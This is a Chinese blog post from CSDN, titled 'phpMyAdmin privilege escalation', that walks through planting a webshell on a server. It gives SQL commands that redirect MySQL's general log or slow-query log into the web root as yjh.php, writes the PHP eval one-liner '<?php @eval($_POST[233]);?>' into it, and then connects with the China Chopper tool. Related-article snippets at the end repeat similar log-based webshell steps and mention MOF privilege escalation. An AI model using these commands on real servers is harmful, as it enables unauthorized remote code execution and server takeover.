phpMyAdmin提权

最新推荐文章于 2024-01-29 16:26:44 发布
最新推荐文章于 2024-01-29 16:26:44 发布
阅读量1.7k 收藏 5
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ga421739102/article/details/103924232
版权

文章目录

条件

1、能成功登录到phpMyAdmin里去
2、有读、写、执行的权限
3、知道网站的绝对路径

操作步骤

1、先爆数据库安装路径

show global variables like "%datadir%";

在这里插入图片描述
因为phpstudy时集成环境,所以网站物理路径是C:\phpstudy\WWW

2、利用日志文件或备份文件来写入一句话

日志文件

1、开启日志

set global general_log = "ON";

2、修改日志文件保存的位置

set global general_log_file="C:\\phpstudy_pro\\WWW\\yjh.php";

3、写入一句话

select '<?php @eval($_POST[233]);?>';

4、查看修改后的信息(随便)

show variables like "%general%";

在这里插入图片描述

备份文件

1、开启备份日志

set global slow_query_log="ON";

2、修改备份日志文件保存的位置

set global slow_query_log_file='C:\\phpStudy2016\\WWW\\yjh.php';

3、写入一句话
备份的,我试了,需要用延迟才能成功注入

select 99999999999999999,'<?php @eval($_POST[233]);?>' or sleep(11);

4、查看修改后的信息(随便)

show variables like "%slow_query_log%";

在这里插入图片描述

3、菜刀连接

在这里插入图片描述

烦恼随风飘
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PhPmyadmin提权之FILE权限修改
weixin_67803112的博客
11-05 562
每一次渗透都是在开盲盒,永远不知道下一个难点在哪里……需要我们一次次尝试,一次次失败,一次次总结,才会把我们所谓的难点变成基操…..
phpmyadmin mysql提权_phpMyadmin提权那些事
weixin_34603814的博客
01-20 215
phpMyadmin提权那些事引言:在渗透测试过程中获知到phpMyadmin的账号密码,如何进行提权呢?往下看,我今天和你说说phpMyadmin提权那些事。0x00 定义​ phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。0x01 环境准备目标: Windows Serve...
phpmyadmin——提权
最新发布
weixin_53639243的博客
01-29 551
general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。比如 如果是 phpstudy启动的 根据 mysql 安装路径 就可以猜出网站的位置。用于 secur_file_priv 为null 或限定值 不在网页目录时。执行下面的sql语句,创建表并在表中写入一句话木马,在导出到网站的根路径。2.secure_file_priv 不为null 具体描述在下边。general_log_file:日志保存路径。3.要知道网站的绝对路径,写入马才能连接。
phpmyadmin通过日记提权
qq_36064883的博客
08-01 241
进入phpmysql里面过够通过sql指令来获取mysql的目录,然后推断出网站路径 指令为 select @@basedir; set global general_log = “ON”; #将日记保存状态开启 SET global general_log_file=’c:/phpStudy/phpstudy/WWW/1.php’ #修改日记的保存位置 然后写入一句话 select‘<?p...
phpmyadmin mysql提权_phpMyadmin提权技巧
weixin_26795171的博客
01-28 501
定义phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。环境准备目标:WindowsServer2003Enterprisex64Edition192.168.17.137攻击机:window7192.168.17.132Php:5.45Mysql:5.5.53Apac...
php检测 Phpmyadmin提权漏洞演示
07-21
【压缩包子文件的文件名称列表】:“Phpmyadmin提权漏洞演示.exe”可能是一个执行文件,包含了一个模拟的环境或工具,用于演示如何检测和利用Phpmyadmin提权漏洞。这个文件可能包含了模拟攻击的步骤、漏洞利用的...
护卫神mysql提权_【转载】提权纪实-突破护卫神目录权限
weixin_39582656的博客
02-12 399
一个dede的站shell,看了下 disable_functionsexec,system,passthru,popen,pclose,shell_exec,proc_open,dl,chmod,escapeshellarg,escapeshellcmd,sh2_exec,proc_terminate,proc_close而且也不支持pcntl_exec函数,MySQL低权限用户,尝试COM组件...
phpmyadmin getshell到提权
KHOST的博客
03-16 629
一. 环境准备: 靶机:win7 32 位。 环境: php:5.45 MYsql:5.5.53 Apache:2.4s 二. 开始攻击。 访问目标站点,发现开启3306 端口, 经过弱口令,爆破,目录泄露等途径已经获知PhpMyadmin的账号密码是root root 1.开始登陆到目标服务器的PhpMyadmin 2.检测MySQL全局变量(generallog、gen...
mysql mof提权_MySQL提权之mof提权
weixin_42498989的博客
01-19 725
mof提权原理关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。下面简单演示下 mof 提权的过程!MOF提权的条件要求十分严苛:1.windows 03及以下版本2.mysql启动身份具有权限去读写c:/windows...
phpMyadmin新建数据库,添加用户并配置用户权限 方法
08-31
phpMyadmin新建数据库,添加用户并配置用户权限 有翻译
phpmyadmin mysql提权_Mysql+PHPmyadmin 提权技巧
weixin_32338107的博客
01-26 235
软件安装:装机软件必备包随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁。1:phpmyadmin后台拿webshellphpmyadmin爆路径方法:weburl+phpmyadmin/themes/darkblue_orange/layout.inc.phphttp://url...
利用phpMyAdmin提权
weixin_30394333的博客
04-26 211
利用phpMyAdmin提权 发表于2016-03-31 | 分类于phpMyAdmin | 暂无评论 | 9次阅读 爆路径 /phpmyadmin/libraries/lect_lang.lib.php /phpMyAdmin/index.php?lang[]=1 /phpMyAdmin/phpinfo.php /load_file() /php...
phpmyadmin提权
cc1988429的专栏
10-13 861
一: 暴路径: libraries/lect_lang.lib.php themes/darkblue_orange/layout.inc.php 二:提权 选择一个Database.运行以下语句. ----start code--- Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES(''''); sel
PHP myAdmin提权
zkjsdk的博客
01-13 509
登录phpmyadmin 后台 默认密码root root 提权的关键点 绝对路径 开启日志 1.先判断日志是否打开 show global variables like ‘%general%’; 如果没开 执行以下语句 set global general_log = “ON”; show global variables like ‘%general%’; 2.设置路径 根据情况设置...
关于PHPMYADMIN的入侵提权拿服务器
热门推荐
u011500307的专栏
12-01 1万+
转自:http://hi.baidu.com/0o1znz1ow/item/651d3bddbd9b7cf03cc2cb1e 作者不详 关于PHPMYADMIN的入侵提权拿服务器 1.今天收到客户一个单子,说是要黑一台电影服务器,然后给了我IP 61.147.*.* 打开网站一看,发现是用FLEAPHP写的一个程序 因为刚好在研究FLEAPHP开源开发系统,大致了
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值